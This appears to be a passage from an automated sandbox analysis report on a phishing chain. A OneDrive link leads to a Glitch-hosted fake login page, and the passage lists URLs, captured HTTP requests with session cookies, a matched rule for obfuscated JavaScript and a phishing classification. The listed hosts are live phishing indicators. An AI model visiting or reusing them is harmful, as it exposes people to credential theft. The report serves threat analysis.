Source: data_1.2.dr String found in binary or memory: https://content-autofill.googleapis.com/v1/pages/Chc2LjEuMTcxNS4xNDQyL2VuIChHR0xMKRIqCUMt63w4MkDvEgk
Source: manifest.json0.0.dr String found in binary or memory: https://content.googleapis.com
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://creativecommons.org/publicdomain/zero/1.0/.
Source: data_3.2.dr String found in binary or memory: https://csp.withgoogle.com/csp/hosted-libraries-pushers
Source: data_3.2.dr String found in binary or memory: https://csp.withgoogle.com/csp/hosted-libraries-pushersCross-Origin-Resource-Policy:
Source: data_3.2.dr String found in binary or memory: https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers
Source: 5eef011a-ef80-4190-b459-3b55c7d34d63.tmp.2.dr, 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, fbd8880a-7af6-4d47-9f74-404a31517fc6.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://dns.google
Source: manifest.json0.0.dr String found in binary or memory: https://feedback.googleusercontent.com
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://fonts.googleapis.com
Source: Network Action Predictor.0.dr String found in binary or memory: https://fonts.googleapis.com/
Source: data_1.2.dr String found in binary or memory: https://fonts.googleapis.com/css?family=Yellowtail&display=swap
Source: manifest.json0.0.dr String found in binary or memory: https://fonts.googleapis.com;
Source: data_3.2.dr, 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://fonts.gstatic.com
Source: data_1.2.dr String found in binary or memory: https://fonts.gstatic.com/s/yellowtail/v17/OZpGg_pnoDtINPfRIlLohlvHwQ.woff2)
Source: manifest.json0.0.dr String found in binary or memory: https://fonts.gstatic.com;
Source: material_css_min.css.0.dr, angular.js.0.dr String found in binary or memory: https://github.com/angular/material
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://github.com/madler/zlib/blob/master/zlib.h
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://hangouts.clients6.google.com
Source: manifest.json0.0.dr String found in binary or memory: https://hangouts.google.com/
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://hangouts.google.com/hangouts/_/logpref
Source: data_1.2.dr String found in binary or memory: https://i.gyazo.com/83cffd1ebf23ed93aa925eb9529f5348.png
Source: data_3.2.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1643387084&rver=7.3.6962.0&wp=MBI_SSL&wre
Source: data_1.2.dr String found in binary or memory: https://logo.clearbit.com/gmail.com
Source: data_1.2.dr String found in binary or memory: https://logo.clearbit.com/gmail.comkf
Source: Network Action Predictor.0.dr String found in binary or memory: https://magenta-flicker-surprise.glitch.me/
Source: data_1.2.dr String found in binary or memory: https://magenta-flicker-surprise.glitch.me/css/hover.css
Source: data_1.2.dr String found in binary or memory: https://magenta-flicker-surprise.glitch.me/css/hover.css/
Source: Current Session.0.dr, data_1.2.dr String found in binary or memory: https://magenta-flicker-surprise.glitch.me/freedo.html
Source: data_1.2.dr String found in binary or memory: https://magenta-flicker-surprise.glitch.me/freedo.htmlM
Source: Network Action Predictor.0.dr String found in binary or memory: https://maxcdn.bootstrapcdn.com/
Source: data_1.2.dr String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
Source: data_1.2.dr String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://meetings.clients6.google.com
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://ogs.google.com
Source: Current Session.0.dr String found in binary or memory: https://onedrive.live.com
Source: Current Session.0.dr String found in binary or memory: https://onedrive.live.com/
Source: data_1.2.dr String found in binary or memory: https://onedrive.live.com/Handlers/Plt.mvc?bicild=&v=0.0.0
Source: unknown HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
  Host: accounts.google.com
  Connection: keep-alive
  Content-Length: 1
  Origin: https://www.google.com
  Content-Type: application/x-www-form-urlencoded
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: unknown DNS traffic detected: queries for: accounts.google.com
Source: global traffic HTTP traffic detected: GET /o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9 HTTP/1.1
  Host: 1drv.ms
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /crx/blobs/Acy1k0bLIjHsvnKaKN_oRpVaYYvFs25d7GKYF1WXrT6yizCMksBO0c_ggE0B6tx6HPRHe6q1GOEe3_NcIbSiGG8kXeLMUY0sAKVvC6R89zvKM13s5VqoAMZSmuUgjQL5vlygJuArQghXXE_qTL7NlQ/extension_8520_615_0_5.crx HTTP/1.1
  Host: clients2.googleusercontent.com
  Connection: keep-alive
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /api/proxy?v=3 HTTP/1.1
  Host: skyapi.onedrive.live.com
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Sec-Fetch-Site: same-site
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Dest: iframe
  Referer: https://onedrive.live.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Cookie: xid=dbfd2c72-fe4c-40c9-9f16-9295c1417bc0&&RD0003FF9C195C&60; wla42=; mkt=en-US; xidseq=3; E=P:W5MLqHri2Yg=:XZwRAMVv+FBam385/rnbcor4xrRNRRQzBG/GSlyXjZE=:F
Source: global traffic HTTP traffic detected: GET /mydata/myprofile/expressionprofile/profilephoto:UserTileStatic,UserTileSmall/MeControlMediumUserTile?ck=1&ex=24&fofoff=1&sc=1643419484127 HTTP/1.1
  Host: storage.live.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
  Sec-Fetch-Site: same-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://onenote.officeapps.live.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Cookie: xid=dbfd2c72-fe4c-40c9-9f16-9295c1417bc0&&RD0003FF9C195C&60; wla42=; mkt=en-US; xidseq=3; E=P:W5MLqHri2Yg=:XZwRAMVv+FBam385/rnbcor4xrRNRRQzBG/GSlyXjZE=:F; BP=l=SDX.Skydrive&FR=&ST=; MUID=3D609D24E268600A10D48C1EE668644C
Source: global traffic HTTP traffic detected: GET /freedo.html HTTP/1.1
  Host: magenta-flicker-surprise.glitch.me
  Connection: keep-alive
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /css/hover.css HTTP/1.1
  Host: magenta-flicker-surprise.glitch.me
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: text/css,*/*;q=0.1
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: style
  Referer: https://magenta-flicker-surprise.glitch.me/freedo.html
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1
  Host: maxcdn.bootstrapcdn.com
  Connection: keep-alive
  Origin: https://magenta-flicker-surprise.glitch.me
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: text/css,*/*;q=0.1
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: style
  Referer: https://magenta-flicker-surprise.glitch.me/freedo.html
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /gmail.com HTTP/1.1
  Host: logo.clearbit.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://magenta-flicker-surprise.glitch.me/freedo.html
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
  Host: maxcdn.bootstrapcdn.com
  Connection: keep-alive
  Origin: https://magenta-flicker-surprise.glitch.me
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: script
  Referer: https://magenta-flicker-surprise.glitch.me/freedo.html
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
  Host: cdnjs.cloudflare.com
  Connection: keep-alive
  Origin: https://magenta-flicker-surprise.glitch.me
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: */*
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: script
  Referer: https://magenta-flicker-surprise.glitch.me/freedo.html
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/sampledata/hack-run.png HTTP/1.1
  Host: shopget24.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /83cffd1ebf23ed93aa925eb9529f5348.png HTTP/1.1
  Host: i.gyazo.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://magenta-flicker-surprise.glitch.me/freedo.html
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /83cffd1ebf23ed93aa925eb9529f5348.png HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
  Host: i.gyazo.com
Source: global traffic HTTP traffic detected: GET /images/sampledata/hack-run.png HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
  Host: shopget24.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/sampledata/hack-run.png HTTP/1.1
  Host: shopget24.com
  Connection: keep-alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
  Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/sampledata/hack-run.png HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
  Host: shopget24.com
Source: unknown HTTPS traffic detected: 104.19.143.111:443 -> 192.168.2.6:49976 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.219.248.46:443 -> 192.168.2.6:49979 version: TLS 1.2

System Summary

Source: 13645.4.pages.csv, type: HTML Matched rule: SUSP_obfuscated_JS_obfuscatorio date = 2021-08-25, author = @imp0rtp3, description = Detect JS obfuscation done by the js obfuscator (often malicious), reference = https://obfuscator.io, score =
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,188383026965401033,7131490049536642209,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1780 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-61F49744-171C.pma
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\8948aa28-1d9e-404e-9621-12e03e91044a.tmp
Source: classification engine Classification label: mal72.phis.win@34/259@27/15
Source: QuotaManager.0.dr Binary or memory string: CREATE TABLE HostQuotaTable(host TEXT NOT NULL, type INTEGER NOT NULL, quota INTEGER DEFAULT 0, UNIQUE(host, type));
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic